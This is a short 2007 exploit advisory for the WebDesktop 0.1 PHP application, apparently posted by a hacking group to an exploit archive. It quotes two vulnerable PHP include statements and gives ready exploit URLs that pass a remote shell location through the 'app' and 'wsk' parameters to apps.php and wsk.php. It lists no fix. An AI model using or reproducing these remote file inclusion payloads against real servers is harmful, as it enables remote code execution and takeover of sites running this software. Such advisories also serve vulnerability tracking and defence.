WebDesktop 0.1 Remote File Inclusion Vulnerabilities

2007-10-11 00:00:00

\\\|///
\\ - - // Xmors Underground Group
( @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
Portal : WebDesktop 0.1
Download : http://downloads.sourceforge.net/pns-webdesktop/webDesktop-0.1-linux.tar.gz
Author : S.W.A.T.
HomePage : wWw.XmorS.CoM
Type : Remote File Inclusion
Y! ID : Svvateam
E-Mail : [email protected] / [email protected]
Dork : :(
----ooooO-----Ooooo--------------------------------------------------
( ) ( )
\ ( ) /
\_) (_/



+---------------------------------------------------------------------------------------------+

Vuln Code :

include($wsk . ".wsk/" . $wsk . ".php");

&&&&&&&&

include($app . ".app/" . $frm . ".frm/" . $frm . ".php");

+---------------------------------------------------------------------------------------------+
+---------------------------------------------------------------------------------------------+

Exploit :

http://[TARGET]/[PATH]/apps/apps.php?app=[-Sh3ll-]
http://[TARGET]/[PATH]/wsk/wsk.php?wsk=[-Sh3ll-]


+---------------------------------------------------------------------------------------------+

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.